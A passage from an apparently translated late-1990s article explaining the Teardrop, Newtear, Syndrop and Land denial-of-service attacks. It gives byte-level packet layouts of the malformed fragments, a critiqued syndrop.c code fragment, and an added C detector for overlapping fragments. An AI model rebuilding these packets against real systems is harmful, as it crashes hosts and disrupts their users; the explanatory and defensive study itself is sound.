     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       40      |   06 = TCP    | (filled by kernel)   3C A0    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                         Source Address                        |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   TCP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |          Source Port          |       Destination Port        |
     |       04              02      |         00            8B      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                       Sequence Number                         |
     |       FE              1D                EE            D9      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                    Acknowledgement Number                     |
     |       FE              2F                2F            9B      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Offset | (reserved)|   Flags   |          Window               |
     |   8   |     0     |    ACK    |         79            60      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Checksum               |      Urgent Pointer           |
     |       21              34      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data:

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       01              01                08            0A      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              39                5F            32      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              39                5F            32      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Packet #3:

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   5   |       00      |         00            37      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Identification         |Flags|    Fragment Offset      |
     |       00              23      |  DF |     00          00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       40      |   06 = TCP    | (filled by kernel)   3C 9C    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                         Source Address                        |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   TCP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |          Source Port          |       Destination Port        |
     |       04              02      |         00            8B      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                       Sequence Number                         |
     |       FE              1D                EE            D9      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                    Acknowledgement Number                     |
     |       FE              2F                2F            9B      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Offset | (reserved)|   Flags   |          Window               |
     |   8   |     0     |URG+ACK+PSH|         79            60      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Checksum               |      Urgent Pointer           |
     |       79              8C      |         00            03      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data:

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       01              01                08            0A      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              39                5F            32      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              39                5F            32      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       42 (B)          79 (y)            65 (e)| (Bye)
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+


 ****************************************************************************


     2.2.2.1. Teardrop
     -----------------

 Teardrop, also known as the Fragment Overlap Bug, is a DoS attack aimed
 squarely at the bugs in the common networking code of operating systems,
 copied wholesale from BSD UNIX.

 Teardrop was discovered on 3-Nov-1997, and it crashed Linux, Win95, WinNT
 and a pile of other operating systems. It is actually based not on an error
 but on an oversight - "we knew about this hole, but we said to ourselves -
 what idiot is going to send packets like that?" ;-)

 Teardrop consists of sending overlapping fragments of a packet.
 Fragmentation is very important in the Internet Protocol, because it allows
 a large packet to be split into several smaller ones, which can then reach
 the recipient even over different routes, and the recipient then
 reassembles them. For the reassembly to come out right, the IP header has
 two fields for this purpose, namely Flags and Fragment Offset.

 The flags are DF (Do not fragment) - set in the fragments so that there is
 no further fragmentation, and MF (More Fragments) - whether more fragments
 are expected. But that is not the important part.

 The important part is the Fragment Offset. It says at what offset in the
 original packet the data from the current fragment should be placed. In the
 first fragment this field is 0 - offset 0 is the start of the packet. In
 the following fragments it gives the offset, in 8-byte increments.

 So, the idea of Teardrop is to first send a normal fragment (which in fact
 contains all of the data), followed by another one whose offset falls
 inside the first (overlaps it), but whose length does not allow it to cover
 the first fragment completely (i.e. the second lies entirely somewhere
 inside the first).

 The original teardrop.c sends a packet that contains (besides the IP
 header) a UDP header (8 bytes) and padding (28 bytes), i.e. 36 bytes of
 payload (in practice it contains the entire declared UDP packet). After it
 a second fragment is sent, which however has an offset of 24 bytes and a
 length of 4 bytes... And boom :-)

 Here is what the data sent by teardrop.c looks like:

   Fragment #1:

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   5   |       00      |         00            38      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Identification         |Flags|    Fragment Offset      |
     |       00              F2      |  MF |     00          00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       40      |   11 = UDP    | (filled by kernel)   C0 A6    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                Source Address (spoofed sample)                |
     |       0C              0D                0E            0F      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   UDP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      Source Port (random)     |   Destination Port (random)   |
     |       86              BF      |         C8            D0      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Length              |          Checksum             |
     |       00              24      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data:

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Fragment #2:

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   5   |       00      |         00            18      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Identification         |Flags|    Fragment Offset      |
     |       00              F2      |     |     00          03      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       40      |   11 = UDP    | (filled by kernel)   E0 C3    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                Source Address (spoofed sample)                |
     |       0C              0D                0E            0F      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data (the same as at the start of the previous packet):

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       86              BF                C8            D0      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 ****************************************************************************


     2.2.2.2. Newtear
     ----------------

 Newtear is a kind of Teardrop attack that affects Win 95 and NT4 with all
 patches applied that were available at the time (8-Jan-1998). Linux is not
 affected; the other UNIXes had not been tested at the time (I am also not
 aware of any other UNIX suffering from this bug).

 The difference between Newtear and the normal Teardrop is that Newtear
 starts by sending a packet with smaller padding (20 instead of 28 bytes),
 and in addition falsifies the size of the UDP data (sets it to twice what
 it really is). The UDP header, however, is still 8 bytes, i.e. the content
 of the first fragment (without the IP header) is 28 bytes, and the second
 is the same as in the original Teardrop - at offset 24.

 Packets sent this way cause a blue screen on both operating systems.

   Fragment #1:

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   5   |       00      |         00            30      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Identification         |Flags|    Fragment Offset      |
     |       00              F2      |  MF |     00          00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       40      |   11 = UDP    | (filled by kernel)   C0 AE    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                Source Address (spoofed sample)                |
     |       0C              0D                0E            0F      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   UDP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      Source Port (random)     |   Destination Port (random)   |
     |       85              61      |         54            5B      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Length              |          Checksum             |
     |       00              30      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data:

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Fragment #2:

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   5   |       00      |         00            18      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Identification         |Flags|    Fragment Offset      |
     |       00              F2      |     |     00          03      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       40      |   11 = UDP    | (filled by kernel)   E0 C3    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                Source Address (spoofed sample)                |
     |       0C              0D                0E            0F      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data (the same as at the start of the previous fragment):

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       85              61                54            5B      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
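
 Added example (not part of the original article and not code from
 teardrop.c): a receiver-side check in C that parses the IP headers drawn
 above for Teardrop and Newtear and flags a second fragment that lies inside
 data already received. The struct, enum and function names are this
 example's own, the "clean" pair is constructed, and the trimming arithmetic
 in residual_len() is an assumed, generic way of resolving overlap rather
 than something the article describes.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Reassembly-relevant fields of one IPv4 fragment (names are this example's own). */
struct frag {
    uint32_t src, dst;    /* fragments belong to one datagram only if   */
    uint8_t  proto;       /* src, dst, protocol and id all match        */
    uint16_t id;
    int      more;        /* MF flag */
    int      start, end;  /* payload byte range [start, end) in the datagram */
};

enum verdict { FRAG_OK, FRAG_OVERLAP, FRAG_CONTAINED, FRAG_UNRELATED, FRAG_MALFORMED };

/* IP headers exactly as drawn in the article's diagrams. */
static const uint8_t TEARDROP_F1[20] = { 0x45,0x00,0x00,0x38, 0x00,0xF2,0x20,0x00,
    0x40,0x11,0xC0,0xA6, 0x0C,0x0D,0x0E,0x0F, 0x7F,0x00,0x00,0x01 };
static const uint8_t NEWTEAR_F1[20]  = { 0x45,0x00,0x00,0x30, 0x00,0xF2,0x20,0x00,
    0x40,0x11,0xC0,0xAE, 0x0C,0x0D,0x0E,0x0F, 0x7F,0x00,0x00,0x01 };
/* Second fragment: the article shows the same header for both attacks. */
static const uint8_t TEAR_F2[20]     = { 0x45,0x00,0x00,0x18, 0x00,0xF2,0x00,0x03,
    0x40,0x11,0xE0,0xC3, 0x0C,0x0D,0x0E,0x0F, 0x7F,0x00,0x00,0x01 };
/* Constructed benign pair: 32 payload bytes, then 4 bytes at offset 32
   (checksum left at 0, it is not verified here). */
static const uint8_t CLEAN_F1[20]    = { 0x45,0x00,0x00,0x34, 0x00,0xF3,0x20,0x00,
    0x40,0x11,0x00,0x00, 0xC0,0x00,0x02,0x01, 0xC0,0x00,0x02,0x02 };
static const uint8_t CLEAN_F2[20]    = { 0x45,0x00,0x00,0x18, 0x00,0xF3,0x00,0x04,
    0x40,0x11,0x00,0x00, 0xC0,0x00,0x02,0x01, 0xC0,0x00,0x02,0x02 };

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Parse an IPv4 header; returns 0 on success, -1 if it is malformed. */
int parse_frag(const uint8_t *h, size_t len, struct frag *f)
{
    if (len < 20 || (h[0] >> 4) != 4) return -1;
    int ihl   = (h[0] & 0x0F) * 4;                 /* IHL counts 32-bit words */
    int total = (h[2] << 8) | h[3];
    if (ihl < 20 || (size_t)ihl > len || total < ihl) return -1;
    f->id    = (uint16_t)((h[4] << 8) | h[5]);
    f->more  = (h[6] & 0x20) != 0;                 /* 0x20 = MF, 0x40 = DF */
    f->start = (((h[6] & 0x1F) << 8) | h[7]) * 8;  /* 13-bit offset, 8-byte units */
    f->end   = f->start + (total - ihl);
    f->proto = h[9];
    f->src   = be32(h + 12);
    f->dst   = be32(h + 16);
    return 0;
}

/* How does `cur` relate to the already received fragment `prev`? */
enum verdict classify(const struct frag *prev, const struct frag *cur)
{
    if (prev->src != cur->src || prev->dst != cur->dst ||
        prev->proto != cur->proto || prev->id != cur->id)
        return FRAG_UNRELATED;
    if (cur->start >= prev->end || cur->end <= prev->start)
        return FRAG_OK;                            /* ranges do not touch */
    if (cur->start >= prev->start && cur->end <= prev->end)
        return FRAG_CONTAINED;                     /* the Teardrop shape */
    return FRAG_OVERLAP;
}

/* Bytes left in `cur` once its start is moved past what `prev` already covers.
   Zero or negative means nothing is left to copy; a reassembler has to test
   for that before the value is ever used as a copy length. */
int residual_len(const struct frag *prev, const struct frag *cur)
{
    int start = cur->start < prev->end ? prev->end : cur->start;
    return cur->end - start;
}

/* Parse two 20-byte headers and report verdict plus residual length. */
int check_pair(const uint8_t *h1, const uint8_t *h2, int *residual)
{
    struct frag a, b;
    if (parse_frag(h1, 20, &a) || parse_frag(h2, 20, &b)) return FRAG_MALFORMED;
    *residual = residual_len(&a, &b);
    return classify(&a, &b);
}

int main(void)
{
    static const char *name[] = { "ok", "overlap", "contained", "unrelated", "malformed" };
    int r = 0, v;
    v = check_pair(TEARDROP_F1, TEAR_F2, &r);
    printf("teardrop: %s, residual %d\n", name[v], r);
    v = check_pair(NEWTEAR_F1, TEAR_F2, &r);
    printf("newtear:  %s, residual %d\n", name[v], r);
    v = check_pair(CLEAN_F1, CLEAN_F2, &r);
    printf("clean:    %s, residual %d\n", name[v], r);
    return 0;
}
```

 A reassembler that drops or rejects any fragment with a residual length of
 zero or less never reaches the copy with a bad length.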

 ****************************************************************************


     2.2.2.3. Syndrop
     ----------------

 Syndrop is a normal Teardrop which in addition also attacks Microsoft's
 SYN sequence bug. For that to be possible, a TCP packet has to be sent
 instead of UDP (so that there is a SYN). That, at least, is the authors'
 description.

 Since attacks like Newtear and Syndrop are based on Teardrop, it is logical
 to expect to see simply the original source (teardrop.c) with some changes.
 And that is indeed the case.

 Unfortunately, when I read syndrop.c more carefully, I saw a bug that has
 evidently escaped the authors (I don't know whether anyone has noticed it
 at all; most people are in the habit of just compiling the DoS attack and
 using it right away, without taking any interest in how it works). And when
 I read even more carefully, I felt outright sick...

 The bug is that the author forgot to change a line or two of the original
 teardrop.c. So he allocates memory for a packet of length
 ip_header+udp_header+data and declares in the IP header that the packet
 length is 48 bytes. Yes, but then he sends ip_header+tcp_header+data with
 sendto(), which makes exactly 60 bytes.

 Looking at the received packet with tcpdump shows that the IP header that
 was sent nevertheless declares 60 bytes, i.e. Linux, besides filling in the
 checksum, also fills in a valid total length for the packet. Even so, this
 example shows how sloppily programs of this kind can be written. All the
 more so when their author did not even write the program himself, but
 modified an existing one.

 Not to mention that, having allocated memory for a 48-byte packet, the
 author also zeroed only that much memory. Then, however, he sends 60 bytes,
 i.e. only 48 bytes of the packet are filled with zeros (excluding those
 that were changed in order to form the headers), and the remaining 12 hold
 some arbitrary content. This should in some way affect the checksum in the
 TCP (not IP, but TCP) header.

 But instead of bothering to compute the TCP checksum every time (not that
 it is all that complicated), the author of the program uses a ready-made
 one - 0x44, which in big endian means 0x4400.

 Here, however, the author's incompetence evidently interferes again. He
 does not manage to form the TCP header properly at all. So as not to make
 unfounded claims, here is a small fragment of code, representing a pitiful
 attempt at forming a TCP header, accompanied by a few comments from yours
 truly. So that you still have some idea of what the author is trying to do,
 though, let me first show the structure of the TCP header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |         Source Port           |      Destination Port         |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                       Sequence Number                         |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                    Acknowledgement Number                     |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Offset | (reserved)|   Flags   |          Window               |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Checksum               |      Urgent Pointer           |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |         Options....                               (Padding)   |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 This is what a TCP header looks like. The Options field is not mandatory,
 and in our case it will be absent. So, here is what the author of syndrop.c
 does (just for clarification - p_ptr is a pointer to the data that has to
 be filled in at the moment. htons() is a standard function from
 netinet/in.h - "host to network short", which, if necessary, turns little
 endian 2-byte words into big endian):

 ----- cut ----- cut ----- cut -----

     *((u_short *)p_ptr) = htons(src_prt);  /* Fills in source port     */
     p_ptr += 2;                            /* and we move on to dest   */

     *((u_short *)p_ptr) = htons(dst_prt);  /* Fills in dest. port      */
     p_ptr += 2;                            /* and moves on to sequence */

     *((u_long *)p_ptr) = seq1;             /* fills in sequence #      */
     p_ptr += 4;                            /* and moves on to ack.#    */

     *((u_long *)p_ptr) = 0;                /* fills in ack.#           */
     p_ptr += 4;                            /* and moves on to offset   */

     /* Up to here everything is fine, now let's see what he does next */

     *((u_short *)p_ptr) = htons(8 + PADDING*2);

       /* Oops... he tries to set a Data Offset of 48 bytes, but seems
          to miss the small detail that the offset field is only
          4 bits, not 2 bytes, and moreover is measured not in bytes
          but in 4-byte words */

     p_ptr += 2;                   /* This sends him to the Window field */

     *((u_char *)p_ptr) = TH_SYN;

       /* But he evidently thinks he is at flags, which is not even
          a whole byte */

     p_ptr += 1;                  /* goes into the high byte of Window */

     *((u_short *)p_ptr) = seq2-seq1;
       /* where he tries to write 2 bytes (the real window), without
          even taking the trouble to convert them to
          big endian with htons()... */

     *((u_short *)p_ptr) = 0x44;
       /* checksum : this is magic value for NT, W95.  dissasemble
          M$ C++ to see why, if you have time */

       /* poor thing... he evidently imagines he is writing the checksum...
          without even advancing p_ptr, and he has evidently forgotten
          htons() as well */

     *((u_short *)p_ptr) = 0;            /* urgent */

       /* and here he tries to write the urgent field... alas, again
          without advancing p_ptr */

 ----- cut ----- cut ----- cut -----

 Well, what is there to explain... I won't comment on the author's
 incompetence any further. Or maybe the source was simply mutilated after he
 wrote it? I find that hard to believe.

 Whatever the reason, I would very much like to find out whether at least
 the idea works, or whether the man simply wrote something, ran it, it
 crashed some old Windows (because, despite the mishaps, he at least did not
 manage to ruin the teardrop part), and he thought he had discovered
 something new. And maybe I will never find out. Either way, for me this DoS
 attack is written off.

 ****************************************************************************


     2.2.3. Land
     -----------

 Land.c saw the light of day on 20-Nov-1997, 17 days after Teardrop. The
 comment at the top of the source says simply "crashes a win95 box", but in
 practice the Land bug (the error that makes the machine crash) exists in
 almost all operating systems, precisely because of the common BSD
 networking code.

 The goal is to send a synchronization (SYN) packet to an _OPEN_ TCP port, a
 packet in which the source and destination IP, as well as the source and
 destination ports, are one and the same, namely those of the victim. And,
 as ManiaX said in Phreedom #8, "after which the little machine starts
 talking to itself, and you know what happens to those who talk to
 themselves" ;-)

 On some operating systems the computer may not crash. There are various
 rumours going around about a dual-processor PPro under WinNT whose CPU
 usage, however, jumped to 99%. Well, for me that is a plain crash.

 The author of land.c (FLC) evidently took his cue from the programmer who
 created EXE files and put his initials in the header (.EXE files begin with
 the characters MZ), so it is no accident that the packet's fragment id, as
 well as the sequence number, are 0xF1C (FLC) ;-)

